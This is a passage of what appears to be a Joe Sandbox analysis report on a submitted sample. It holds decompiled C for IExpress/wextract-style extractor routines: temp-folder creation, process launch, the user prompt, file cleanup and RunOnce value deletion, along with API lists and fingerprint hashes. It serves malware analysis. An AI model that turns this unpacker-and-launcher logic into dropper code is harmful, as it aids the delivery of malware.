                              							_v8 = 0;
                              							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                              							if(_t24 == 0) {
                              								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                              								L6:
                              								asm("sbb eax, eax");
                              								_v8 = _v8 &  !( ~_t19);
                              								RegCloseKey(_v12); // executed
                              							}
                              							L7:
                              							_t31 = _v8;
                              						}
                              					}
                              				}
                              				return _t31;
                              				goto L12;
                              			}












                              APIs
                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00A74096,00A74096,?,00A71ED3,00000001,00000000,?,?,00A74137,?), ref: 00A725B2
                              • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00A74096,?,00A71ED3,00000001,00000000,?,?,00A74137,?,00A74096), ref: 00A725CB
                              • RegCloseKey.KERNELBASE(?,?,00A71ED3,00000001,00000000,?,?,00A74137,?,00A74096), ref: 00A725DD
                              • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00A74096,00A74096,?,00A71ED3,00000001,00000000,?,?,00A74137,?), ref: 00A725FF
                              • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00A74096,00000000,00000000,00000000,00000000,?,00A71ED3,00000001,00000000), ref: 00A7261A
                              Strings
                              • System\CurrentControlSet\Control\Session Manager, xrefs: 00A725A8
                              • PendingFileRenameOperations, xrefs: 00A725C3
                              • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00A725F5
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: OpenQuery$CloseInfoValue
                              • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                              • API String ID: 2209512893-559176071
                              • Opcode ID: e1524e269956faa74cb54c560373bd02bb8b4474d753289efb3cbf356ec53191
                              • Instruction ID: a26655bb452d8a4a9e8aeec9af8541b732ff81ac95684e77f0387cd9e90901d1
                              • Opcode Fuzzy Hash: e1524e269956faa74cb54c560373bd02bb8b4474d753289efb3cbf356ec53191
                              • Instruction Fuzzy Hash: 45113D35A42228BBAB20DB919C0DEFFBEBCEB557A1F10C055B80DA2010D6345A46D7A1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 533 a76a60-a76a91 call a77155 call a77208 GetStartupInfoW 539 a76a93-a76aa2 533->539 540 a76aa4-a76aa6 539->540 541 a76abc-a76abe 539->541 542 a76aaf-a76aba Sleep 540->542 543 a76aa8-a76aad 540->543 544 a76abf-a76ac5 541->544 542->539 543->544 545 a76ac7-a76acf _amsg_exit 544->545 546 a76ad1-a76ad7 544->546 547 a76b0b-a76b11 545->547 548 a76b05 546->548 549 a76ad9-a76ae9 call a76c3f 546->549 550 a76b13-a76b24 _initterm 547->550 551 a76b2e-a76b30 547->551 548->547 555 a76aee-a76af2 549->555 550->551 553 a76b32-a76b39 551->553 554 a76b3b-a76b42 551->554 553->554 556 a76b67-a76b71 554->556 557 a76b44-a76b51 call a77060 554->557 555->547 558 a76af4-a76b00 555->558 560 a76b74-a76b79 556->560 557->556 567 a76b53-a76b65 557->567 561 a76c39-a76c3e call a7724d 558->561 564 a76bc5-a76bc8 560->564 565 a76b7b-a76b7d 560->565 568 a76bd6-a76be3 _ismbblead 564->568 569 a76bca-a76bd3 564->569 570 a76b94-a76b98 565->570 571 a76b7f-a76b81 565->571 567->556 575 a76be5-a76be6 568->575 576 a76be9-a76bed 568->576 569->568 573 a76ba0-a76ba2 570->573 574 a76b9a-a76b9e 570->574 571->564 572 a76b83-a76b85 571->572 572->570 577 a76b87-a76b8a 572->577 578 a76ba3-a76bbc call a72bfb 573->578 574->578 575->576 576->560 580 a76c1e-a76c25 576->580 577->570 581 a76b8c-a76b92 577->581 578->580 586 a76bbe-a76bbf exit 578->586 583 a76c27-a76c2d _cexit 580->583 584 a76c32 580->584 581->572 583->584 584->561 586->564
                              C-Code - Quality: 51%
                              			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                              				signed int* _t25;
                              				signed int _t26;
                              				signed int _t29;
                              				int _t30;
                              				signed int _t37;
                              				signed char _t41;
                              				signed int _t53;
                              				signed int _t54;
                              				intOrPtr _t56;
                              				signed int _t58;
                              				signed int _t59;
                              				intOrPtr* _t60;
                              				void* _t62;
                              				void* _t67;
                              				void* _t68;
                              
                              				E00A77155();
                              				_push(0x58);
                              				_push(0xa772b8);
                              				E00A77208(__ebx, __edi, __esi);
                              				 *(_t62 - 0x20) = 0;
                              				GetStartupInfoW(_t62 - 0x68);
                              				 *((intOrPtr*)(_t62 - 4)) = 0;
                              				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                              				_t53 = 0;
                              				while(1) {
                              					asm("lock cmpxchg [edx], ecx");
                              					if(0 == 0) {
                              						break;
                              					}
                              					if(0 != _t56) {
                              						Sleep(0x3e8);
                              						continue;
                              					} else {
                              						_t58 = 1;
                              						_t53 = 1;
                              					}
                              					L7:
                              					_t67 =  *0xa788b0 - _t58; // 0x2
                              					if(_t67 != 0) {
                              						__eflags =  *0xa788b0; // 0x2
                              						if(__eflags != 0) {
                              							 *0xa781e4 = _t58;
                              							goto L13;
                              						} else {
                              							 *0xa788b0 = _t58;
                              							_t37 = E00A76C3F(0xa710b8, 0xa710c4); // executed
                              							__eflags = _t37;
                              							if(__eflags == 0) {
                              								goto L13;
                              							} else {
                              								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                              								_t30 = 0xff;
                              							}
                              						}
                              					} else {
                              						_push(0x1f);
                              						L00A76FF4();
                              						L13:
                              						_t68 =  *0xa788b0 - _t58; // 0x2
                              						if(_t68 == 0) {
                              							_push(0xa710b4);
                              							_push(0xa710ac);
                              							L00A77202();
                              							 *0xa788b0 = 2;
                              						}
                              						if(_t53 == 0) {
                              							 *0xa788ac = 0;
                              						}
                              						_t71 =  *0xa788b4;
                              						if( *0xa788b4 != 0 && E00A77060(_t71, 0xa788b4) != 0) {
                              							_t60 =  *0xa788b4; // 0x0
                              							 *0xa7a288(0, 2, 0);
                              							 *_t60();
                              						}
                              						_t25 = __imp___acmdln; // 0x76235b9c
                              						_t59 =  *_t25;
                              						 *(_t62 - 0x1c) = _t59;
                              						_t54 =  *(_t62 - 0x20);
                              						while(1) {
                              							_t41 =  *_t59;
                              							if(_t41 > 0x20) {
                              								goto L32;
                              							}
                              							if(_t41 != 0) {
                              								if(_t54 != 0) {
                              									goto L32;
                              								} else {
                              									while(_t41 != 0 && _t41 <= 0x20) {
                              										_t59 = _t59 + 1;
                              										 *(_t62 - 0x1c) = _t59;
                              										_t41 =  *_t59;
                              									}
                              								}
                              							}
                              							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                              							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                              								_t29 = 0xa;
                              							} else {
                              								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                              							}
                              							_push(_t29);
                              							_t30 = E00A72BFB(0xa70000, 0, _t59); // executed
                              							 *0xa781e0 = _t30;
                              							__eflags =  *0xa781f8;
                              							if( *0xa781f8 == 0) {
                              								exit(_t30); // executed
                              								goto L32;
                              							}
                              							__eflags =  *0xa781e4;
                              							if( *0xa781e4 == 0) {
                              								__imp___cexit();
                              								_t30 =  *0xa781e0; // 0x0
                              							}
                              							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                              							goto L40;
                              							L32:
                              							__eflags = _t41 - 0x22;
                              							if(_t41 == 0x22) {
                              								__eflags = _t54;
                              								_t15 = _t54 == 0;
                              								__eflags = _t15;
                              								_t54 = 0 | _t15;
                              								 *(_t62 - 0x20) = _t54;
                              							}
                              							_t26 = _t41 & 0x000000ff;
                              							__imp___ismbblead(_t26);
                              							__eflags = _t26;
                              							if(_t26 != 0) {
                              								_t59 = _t59 + 1;
                              								__eflags = _t59;
                              								 *(_t62 - 0x1c) = _t59;
                              							}
                              							_t59 = _t59 + 1;
                              							 *(_t62 - 0x1c) = _t59;
                              						}
                              					}
                              					L40:
                              					return E00A7724D(_t30);
                              				}
                              				_t58 = 1;
                              				__eflags = 1;
                              				goto L7;
                              			}



















                              APIs
                                • Part of subcall function 00A77155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00A77182
                                • Part of subcall function 00A77155: GetCurrentProcessId.KERNEL32 ref: 00A77191
                                • Part of subcall function 00A77155: GetCurrentThreadId.KERNEL32 ref: 00A7719A
                                • Part of subcall function 00A77155: GetTickCount.KERNEL32 ref: 00A771A3
                                • Part of subcall function 00A77155: QueryPerformanceCounter.KERNEL32(?), ref: 00A771B8
                              • GetStartupInfoW.KERNEL32(?,00A772B8,00000058), ref: 00A76A7F
                              • Sleep.KERNEL32(000003E8), ref: 00A76AB4
                              • _amsg_exit.MSVCRT ref: 00A76AC9
                              • _initterm.MSVCRT ref: 00A76B1D
                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00A76B49
                              • exit.KERNELBASE ref: 00A76BBF
                              • _ismbblead.MSVCRT ref: 00A76BDA
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                              • String ID:
                              • API String ID: 836923961-0
                              • Opcode ID: 9f3efda9e6acd7a1102c897e80294d181fa03085cb9b0a869826e4d56c6420d4
                              • Instruction ID: 94e8479e2ae084a1981432b14ad5fbd368cd020c0795b8ce497599e795e126ef
                              • Opcode Fuzzy Hash: 9f3efda9e6acd7a1102c897e80294d181fa03085cb9b0a869826e4d56c6420d4
                              • Instruction Fuzzy Hash: EA41F631984B25DBDB21DBA8DD087AE77F4FB85761F54C12AE84DE3291CF7448828B81
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 587 a758c8-a758d5 588 a758d8-a758dd 587->588 588->588 589 a758df-a758f1 LocalAlloc 588->589 590 a758f3-a75901 call a744b9 589->590 591 a75919-a75959 call a71680 call a7658a CreateFileA LocalFree 589->591 594 a75906-a75910 call a76285 590->594 591->594 601 a7595b-a7596c CloseHandle GetFileAttributesA 591->601 600 a75912-a75918 594->600 601->594 602 a7596e-a75970 601->602 602->594 603 a75972-a7597b 602->603 603->600
                              C-Code - Quality: 95%
                              			E00A758C8(intOrPtr* __ecx) {
                              				void* _v8;
                              				intOrPtr _t6;
                              				void* _t10;
                              				void* _t12;
                              				void* _t14;
                              				signed char _t16;
                              				void* _t20;
                              				void* _t23;
                              				intOrPtr* _t27;
                              				CHAR* _t33;
                              
                              				_push(__ecx);
                              				_t33 = __ecx;
                              				_t27 = __ecx;
                              				_t23 = __ecx + 1;
                              				do {
                              					_t6 =  *_t27;
                              					_t27 = _t27 + 1;
                              				} while (_t6 != 0);
                              				_t36 = _t27 - _t23 + 0x14;
                              				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                              				if(_t20 != 0) {
                              					E00A71680(_t20, _t36, _t33);
                              					E00A7658A(_t20, _t36, "TMP4351$.TMP");
                              					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                              					_v8 = _t10;
                              					LocalFree(_t20);
                              					_t12 = _v8;
                              					if(_t12 == 0xffffffff) {
                              						goto L4;
                              					} else {
                              						CloseHandle(_t12);
                              						_t16 = GetFileAttributesA(_t33); // executed
                              						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                              							goto L4;
                              						} else {
                              							 *0xa79124 = 0;
                              							_t14 = 1;
                              						}
                              					}
                              				} else {
                              					E00A744B9(0, 0x4b5, 0, 0, 0x10, 0);
                              					L4:
                              					 *0xa79124 = E00A76285();
                              					_t14 = 0;
                              				}
                              				return _t14;
                              			}

                              APIs
                              • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00A75534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A758E7
                              • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00A75534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A75943
                              • LocalFree.KERNEL32(00000000,?,00A75534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A7594D
                              • CloseHandle.KERNEL32(00000000,?,00A75534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A7595C
                              • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00A75534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00A75963
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$TMP4351$.TMP
                              • API String ID: 747627703-3033780695
                              • Opcode ID: 174165f72f13bcd4f338980ea7a0fafb1bddb4cf833b8b592f8e4d22cf7493ea
                              • Instruction ID: dbf972e3de1244703ba4074509ae52bdf73768959dc5bff859879203882a1e2f
                              • Opcode Fuzzy Hash: 174165f72f13bcd4f338980ea7a0fafb1bddb4cf833b8b592f8e4d22cf7493ea
                              • Instruction Fuzzy Hash: 7F11E671B0061177D7249FB95C4DB9B7F99EF86360F10CA25B60DD3191DBB0984686A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 631 a73fef-a74010 632 a74016-a7403b CreateProcessA 631->632 633 a7410a-a7411a call a76ce0 631->633 634 a740c4-a74101 call a76285 GetLastError FormatMessageA call a744b9 632->634 635 a74041-a7406e WaitForSingleObject GetExitCodeProcess 632->635 650 a74106 634->650 638 a74091 call a7411b 635->638 639 a74070-a74077 635->639 644 a74096-a740b8 CloseHandle * 2 638->644 639->638 643 a74079-a7407b 639->643 643->638 646 a7407d-a74089 643->646 648 a740ba-a740c0 644->648 649 a74108 644->649 646->638 647 a7408b 646->647 647->638 648->649 651 a740c2 648->651 649->633 650->649 651->650
                              C-Code - Quality: 84%
                              			E00A73FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                              				signed int _v8;
                              				char _v524;
                              				long _v528;
                              				struct _PROCESS_INFORMATION _v544;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t20;
                              				void* _t22;
                              				int _t25;
                              				intOrPtr* _t39;
                              				signed int _t44;
                              				void* _t49;
                              				signed int _t50;
                              				intOrPtr _t53;
                              
                              				_t45 = __edx;
                              				_t20 =  *0xa78004; // 0x74742267
                              				_v8 = _t20 ^ _t50;
                              				_t39 = __ecx;
                              				_t49 = 1;
                              				_t22 = 0;
                              				if(__ecx == 0) {
                              					L13:
                              					return E00A76CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                              				}
                              				asm("stosd");
                              				asm("stosd");
                              				asm("stosd");
                              				asm("stosd");
                              				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                              				if(_t25 == 0) {
                              					 *0xa79124 = E00A76285();
                              					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
                              					_t45 = 0x4c4;
                              					E00A744B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
                              					L11:
                              					_t49 = 0;
                              					L12:
                              					_t22 = _t49;
                              					goto L13;
                              				}
                              				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                              				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                              				_t44 = _v528;
                              				_t53 =  *0xa78a28; // 0x0
                              				if(_t53 == 0) {
                              					_t34 =  *0xa79a2c; // 0x0
                              					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                              						_t34 = _t44 & 0xff000000;
                              						if((_t44 & 0xff000000) == 0xaa000000) {
                              							 *0xa79a2c = _t44;
                              						}
                              					}
                              				}
                              				E00A7411B(_t34, _t44);
                              				CloseHandle(_v544.hThread);
                              				CloseHandle(_v544);
                              				if(( *0xa79a34 & 0x00000400) == 0 || _v528 >= 0) {
                              					goto L12;
                              				} else {
                              					goto L11;
                              				}
                              			}

                              APIs
                              • CreateProcessA.KERNELBASE ref: 00A74033
                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00A74049
                              • GetExitCodeProcess.KERNELBASE ref: 00A7405C
                              • CloseHandle.KERNEL32(?), ref: 00A7409C
                              • CloseHandle.KERNEL32(?), ref: 00A740A8
                              • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00A740DC
                              • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00A740E9
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                              • String ID:
                              • API String ID: 3183975587-0
                              • Opcode ID: fd5343a6f8aabd8f9e6bcf5f508c0a83bdcaba0392feb1340a941f766b2bbf48
                              • Instruction ID: 194c146b7e53ac0bd5957ee26d61ca8cf7872b1d361d0279992b054e813714a0
                              • Opcode Fuzzy Hash: fd5343a6f8aabd8f9e6bcf5f508c0a83bdcaba0392feb1340a941f766b2bbf48
                              • Instruction Fuzzy Hash: 8F317E31641218BBEB209BA5DC49FAB777CEBD8701F10C2A9F50DD2161C7344DC6CA65
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 652 a751e5-a7520b call a7468f LocalAlloc 655 a7522d-a7523c call a7468f 652->655 656 a7520d-a75228 call a744b9 call a76285 652->656 661 a75262-a75270 lstrcmpA 655->661 662 a7523e-a75260 call a744b9 LocalFree 655->662 668 a752b0 656->668 666 a75272-a75273 LocalFree 661->666 667 a7527e-a7529c call a744b9 LocalFree 661->667 662->668 670 a75279-a7527c 666->670 674 a752a6 667->674 675 a7529e-a752a4 667->675 672 a752b2-a752b5 668->672 670->672 674->668 675->670
                              C-Code - Quality: 100%
                              			E00A751E5(void* __eflags) {
                              				int _t5;
                              				void* _t6;
                              				void* _t28;
                              
                              				_t1 = E00A7468F("UPROMPT", 0, 0) + 1; // 0x1
                              				_t28 = LocalAlloc(0x40, _t1);
                              				if(_t28 != 0) {
                              					if(E00A7468F("UPROMPT", _t28, _t29) != 0) {
                              						_t5 = lstrcmpA(_t28, "<None>"); // executed
                              						if(_t5 != 0) {
                              							_t6 = E00A744B9(0, 0x3e9, _t28, 0, 0x20, 4);
                              							LocalFree(_t28);
                              							if(_t6 != 6) {
                              								 *0xa79124 = 0x800704c7;
                              								L10:
                              								return 0;
                              							}
                              							 *0xa79124 = 0;
                              							L6:
                              							return 1;
                              						}
                              						LocalFree(_t28);
                              						goto L6;
                              					}
                              					E00A744B9(0, 0x4b1, 0, 0, 0x10, 0);
                              					LocalFree(_t28);
                              					 *0xa79124 = 0x80070714;
                              					goto L10;
                              				}
                              				E00A744B9(0, 0x4b5, 0, 0, 0x10, 0);
                              				 *0xa79124 = E00A76285();
                              				goto L10;
                              			}

                              APIs
                                • Part of subcall function 00A7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A746A0
                                • Part of subcall function 00A7468F: SizeofResource.KERNEL32(00000000,00000000,?,00A72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746A9
                                • Part of subcall function 00A7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A746C3
                                • Part of subcall function 00A7468F: LoadResource.KERNEL32(00000000,00000000,?,00A72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746CC
                                • Part of subcall function 00A7468F: LockResource.KERNEL32(00000000,?,00A72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746D3
                                • Part of subcall function 00A7468F: memcpy_s.MSVCRT ref: 00A746E5
                                • Part of subcall function 00A7468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746EF
                              • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00A72F4D,?,00000002,00000000), ref: 00A75201
                              • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00A75250
                                • Part of subcall function 00A744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A74518
                                • Part of subcall function 00A744B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A74554
                                • Part of subcall function 00A76285: GetLastError.KERNEL32(00A75BBC), ref: 00A76285
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                              • String ID: <None>$UPROMPT
                              • API String ID: 957408736-2980973527
                              • Opcode ID: 06d96f73a0e236f3ba65a5caea18c9a65de027d80bf9544630cb362e4cbb95ee
                              • Instruction ID: a0875dfd0e32e14c5b99041bd605fe9941d35f558abf0f281379104bc2b52ac0
                              • Opcode Fuzzy Hash: 06d96f73a0e236f3ba65a5caea18c9a65de027d80bf9544630cb362e4cbb95ee
                              • Instruction Fuzzy Hash: BE1108B1B006017BE354ABB15D45F7B62DDDBD9340F50C439F60ED5191EBB98C425168
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 74%
                              			E00A752B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                              				signed int _v8;
                              				char _v268;
                              				signed int _t9;
                              				signed int _t11;
                              				void* _t21;
                              				void* _t29;
                              				CHAR** _t31;
                              				void* _t32;
                              				signed int _t33;
                              
                              				_t28 = __edi;
                              				_t22 = __ecx;
                              				_t21 = __ebx;
                              				_t9 =  *0xa78004; // 0x74742267
                              				_v8 = _t9 ^ _t33;
                              				_push(__esi);
                              				_t31 =  *0xa791e0; // 0x2e18408
                              				if(_t31 != 0) {
                              					_push(__edi);
                              					do {
                              						_t29 = _t31;
                              						if( *0xa78a24 == 0 &&  *0xa79a30 == 0) {
                              							SetFileAttributesA( *_t31, 0x80); // executed
                              							DeleteFileA( *_t31); // executed
                              						}
                              						_t31 = _t31[1];
                              						LocalFree( *_t29);
                              						LocalFree(_t29);
                              					} while (_t31 != 0);
                              					_pop(_t28);
                              				}
                              				_t11 =  *0xa78a20; // 0x0
                              				_pop(_t32);
                              				if(_t11 != 0 &&  *0xa78a24 == 0 &&  *0xa79a30 == 0) {
                              					_push(_t22);
                              					E00A71781( &_v268, 0x104, _t22, "C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
                              					if(( *0xa79a34 & 0x00000020) != 0) {
                              						E00A765E8( &_v268);
                              					}
                              					SetCurrentDirectoryA(".."); // executed
                              					_t22 =  &_v268;
                              					E00A72390( &_v268);
                              					_t11 =  *0xa78a20; // 0x0
                              				}
                              				if( *0xa79a40 != 1 && _t11 != 0) {
                              					_t11 = E00A71FE1(_t22); // executed
                              				}
                              				 *0xa78a20 =  *0xa78a20 & 0x00000000;
                              				return E00A76CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                              			}

                              APIs
                              • SetFileAttributesA.KERNELBASE(02E18408,00000080,?,00000000), ref: 00A752F2
                              • DeleteFileA.KERNELBASE(02E18408), ref: 00A752FA
                              • LocalFree.KERNEL32(02E18408,?,00000000), ref: 00A75305
                              • LocalFree.KERNEL32(02E18408), ref: 00A7530C
                              • SetCurrentDirectoryA.KERNELBASE(00A711FC,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00A75363
                              Strings
                              • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00A75334
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                              • API String ID: 2833751637-3647970563
                              • Opcode ID: d110ceba95dd97f385a86f693945b9e21464f8e1ad33d642476870009c65389a
                              • Instruction ID: 1d45f4b4ef7852e3a54c3ef4b1736d75a7dea65fdba91557c0fdc93a95714918
                              • Opcode Fuzzy Hash: d110ceba95dd97f385a86f693945b9e21464f8e1ad33d642476870009c65389a
                              • Instruction Fuzzy Hash: E621CF31901A04EBDB20DBB4DD19B6A37B4BB50391F04C66AE44E5A1B0CBF45CC7CB80
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00A71FE1(void* __ecx) {
                              				void* _v8;
                              				long _t4;
                              
                              				if( *0xa78530 != 0) {
                              					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                              					if(_t4 == 0) {
                              						RegDeleteValueA(_v8, "wextract_cleanup1"); // executed
                              						return RegCloseKey(_v8);
                              					}
                              				}
                              				return _t4;
                              			}






                              APIs
                              • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,00A7538C,?,?,00A7538C), ref: 00A72005
                              • RegDeleteValueA.KERNELBASE(00A7538C,wextract_cleanup1,?,?,00A7538C), ref: 00A72017
                              • RegCloseKey.ADVAPI32(00A7538C,?,?,00A7538C), ref: 00A72020
                              Strings
                              Memory Dump Source
